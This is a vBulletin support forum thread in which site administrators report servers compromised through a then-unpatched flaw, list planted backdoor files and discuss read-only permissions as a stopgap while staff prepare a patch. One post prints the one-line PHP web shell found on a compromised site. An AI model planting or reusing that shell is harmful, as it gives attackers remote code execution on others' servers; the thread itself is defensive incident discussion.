Announcement

Collapse
No announcement yet.

Known Exploit Warning Question

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Known Exploit Warning Question

    This morning I received the scan results on my server with a:

    '/home/*******/public_html/forums/web.php'
    Known exploit = [Fingerprint Match] [PHP Shell Exploit [P1747]]

    Indicating I have some type of issue. It was recommended that I replace the web.php file. That is fine but I don't know what this file does or where another copy of it would be.

    I am running 5.6.2 PHP 7.1.33 MySql Version 5.7.31log

    I know I have an update on my desk that needs to be done and was going to work on that today. Will that take care of this issue or do I have a bigger fish to fry somewhere? Thanks in advance for the assistance.

  • #2
    It looks like there are two instances in 5.6.1 PL1

    /core/vb/request

    /core/vb/session

    Comment


    • #3
      Our team is looking into this issue. There is no "web.php" file included with vBulletin. You can see all suspect files by going into the AdminCP and visiting Maintenance -> Diagnostics. Making your vBulletin directory read only will prevent people from trying to write to the directory while we investigate.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API - Full / Mobile
      Vote for your favorite feature requests and the bugs you want to see fixed.

      Comment


      • #4
        Well at least in 5.5.5 there are 2 web.php in vb:

        /upload/core/vb/request
        /upload/core/vb/session

        as mentioned already.

        They do not exist in 5.6.3 alpha4
        Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".

        Comment


        • #5
          My site was also compromised this morning at 6:35 AM GMT-7. The file is named 1.php and was placed in the root of the site. Windows Defender identified the exploit as Backdoor:PHP/Shell.Q
          https://www.microsoft.com/en-us/wdsi...tid=2147682386

          I've zipped up the file and attached here as Backdoor.zip.
          Last edited by Wayne Luke; Mon 10 Aug '20, 10:32am.
          VB 5.6.3
          PHP 7.4
          MySQL 5.7.24

          Comment


          • #6
            I've removed the attachment. It really is meaningless to post it. The developers are working on a solution.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • OrganForum
              OrganForum commented
              Editing a comment
              OK, thought it would be useful for solving the issue.

          • #7
            Originally posted by Niktator View Post
            Well at least in 5.5.5 there are 2 web.php in vb:
            I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.

            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • #8
              Originally posted by Wayne Luke View Post

              I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.
              I know. But this explains why some users got the web.php in their install. Telling there is no web.php is a bit more confusing then saying "we had a web-php in older versions"....

              Waiting for "the solution" and even more for a list of affected versions.
              Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".

              Comment


              • #9
                I got hacked at noon (CST) today -- was on 5-6-1 Patch Level 1.

                Have upgraded to 5-6-2. Can provide http access and error logs to Wayne Luke if you guys need help determining the attack vector.

                Comment


                • #10
                  We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API - Full / Mobile
                  Vote for your favorite feature requests and the bugs you want to see fixed.

                  Comment


                  • holymannn
                    holymannn commented
                    Editing a comment
                    All directory to 444? From /forum and it’s sub folders?

                • #11
                  Originally posted by Wayne Luke View Post
                  We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                  Perfect. Done.

                  Comment


                  • #12
                    I found the files hax.php at these locations:

                    includes/vb5/template/cache/hax.php
                    includes/vb5/template/bbcode/hax.php

                    code is:
                    Code:
                    <?php eval($_POST[1]);?>
                    Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".

                    Comment


                    • #13
                      They could be anywhere in the system. Make your file system read only so the webserver cannot write to it.

                      Use the suspect files diagnostic to delete files and directories not part of vBulletin and that you did not place on the server yourself.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API - Full / Mobile
                      Vote for your favorite feature requests and the bugs you want to see fixed.

                      Comment


                      • #14
                        My 5.6.1 site was hit and I cannot access either url. I have 444'd it.

                        My 5.6.2 sites appear unaffected.
                        Last edited by NumNum; Mon 10 Aug '20, 12:35pm.
                        adktramping ~ my happy place.

                        "Whoever said practice makes perfect was an idiot. Humans can't be perfect because we're not machines." ~ Sam Gardner.

                        Vote for your favorite feature requests and the bugs you want to see fixed.

                        Comment


                        • OrganForum
                          OrganForum commented
                          Editing a comment
                          I was running 5.6.2 when exploited. This forum, forum.vbulletin.com, was down for maintenance this morning. I assume it was also exploited and all version 5.x.x are vulnerable.

                        • NumNum
                          NumNum commented
                          Editing a comment
                          Thank you for verifying.

                      • #15
                        Originally posted by Wayne Luke View Post
                        We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                        I spoke too soon. Chmod 444 on the vbulletin root directory causes an issue with .htaccess not being readable (weird considering it IS readable with 444). I can work through that, but for me it wasn't as simple as setting 444.

                        Comment


                        • OrganForum
                          OrganForum commented
                          Editing a comment
                          I think htaccess needs to be executable as well as readable. Encountered same problem with 444

                          chmod 555 works
                          I've close my forum until a patch is ready.

                        • NumNum
                          NumNum commented
                          Editing a comment
                          What issue did you have? my site wont read my htaccess and its permissions are 644

                      Related Topics

                      Collapse

                      Working...
                      X